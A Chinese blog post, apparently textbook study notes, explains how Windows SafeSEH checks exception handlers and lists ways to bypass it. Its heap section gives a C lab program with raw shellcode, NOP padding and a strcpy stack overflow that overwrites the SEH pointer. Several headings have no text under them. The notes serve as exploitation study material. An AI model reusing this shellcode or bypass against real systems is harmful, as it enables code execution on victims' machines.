漏洞利用原理(高级)

本文详细介绍了如何绕过SafeSEH保护机制,包括利用虚函数、堆中的shellcode、未启用SafeSEH的模块、加载模块之外的地址以及Adobe Flash Player ActiveX控件来实施攻击。通过理解SafeSEH的工作原理,攻击者可以找到多种方法来规避异常处理的安全检查,从而执行恶意代码。
摘要由CSDN通过智能技术生成

SafeSEH对异常处理的保护原理

SafeSEH工作原理:在程序调用异常处理函数前,对调用的异常处理函数进行一系列有效性校验,当发现异常处理函数不可靠时将终止调用。

SafeSEH需要操作系统和编译器的双重支持:

  • 编译器
    启用/SafeSEH选项后,编译器会将所有的异常处理函数地址提取出来,编入一张安全S.E.H表,并将表放入程序镜像。当程序调用异常处理函数时会将函数地址与安全S.E.H表进行匹配,检查是否位于该表中
  • 操作系统
    • 检查异常处理链是否位于当前程序栈中
    • 检查异常处理函数指针是否指向当前程序栈中(是则终止调用)
    • 调用RtlISvalidHandle()对异常处理函数的有效性进行验证
      • 判断异常处理函数地址是否是在加载模块的内存空间(是)
        • 判断程序是否设置了IMAGE_DLLCHARACTERISTICS_NO_SEH标识,如果设置了,则此程序内的异常将被忽略,函数直接返回校验失败
        • 检测程序是否包含安全S.E.H表,如包含则进行匹配
        • 判断程序是否设置ILonly标识,如设置则说明该程序只包含.NET编译人中间语言,直接返回校验失败
        • 判断异常处理函数地址是否位于不可执行页上,如果位于则检测DEP是否开启,如未开启则返回成功
      • (否)
        • 判断是否位于不可执行页上
        • 判断系统是否允许跳转到加载模块的内存空间外执行

RtlIsValidHandle()函数的整个校验流程:
在这里插入图片描述

所以会允许异常处理函数的情况包括:

  • 异常处理函数位于加载模块内存范围之外,DEP关闭
    不考虑DEP,只需要在加载模块内存范围之外找到一个跳板指令即可
  • 异常处理函数位于加载模块内存范围之内,相应模块未启用SafeSEH(安全S.E.H表为空),且该模块未设置IL
    可以利用未启用SafeSEH模块中的指令作为跳板
  • 异常处理函数位于加载模块内存范围之内,启用SafeSEH(安全S.E.H表不为空),异常处理地址包含在安全S.E.H表中
    清空安全S.E.H表、将我们的指令注册到安全S.E.H表中

攻击返回地址绕过SafeSEH

利用虚函数绕或SafeSEH

从堆中绕过SafeSEH

如果S.E.H中的异常函数指针指向堆区,即使安全校验发现其不可信,仍然会调用被修改过的异常处理函数,因此只需要将sellcode布置在堆区即可。

示例代码:

#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xB8\x28\x3A\x00"        //shellcode在堆中的地址
;

void test(char * input)
{
   
	
	char str[200];
	strcpy(str,input);       //在栈中导入shellcode,覆盖进程S.E.H信息	
    int zero=0;
	zero=1/zero;            //激发一个异常
}

void main()
{
   
	char * buf=(char *)malloc(500);       //在堆中申请一个500字节的空间
	//__asm int 3
	strcpy(buf,shellcode);        //在堆中存入shellcode
	test(shellcode);	
}

先将shellcode设置为199个0x90,查看相关信息:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
shellcode起始于0012FE8C,S.E.H位于0012FFB0+4处,因此使用300个字节就可以覆盖掉异常处理函数指针。
在这里插入图片描述

利用未启用SafeSEH模块绕过SafeSEH

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值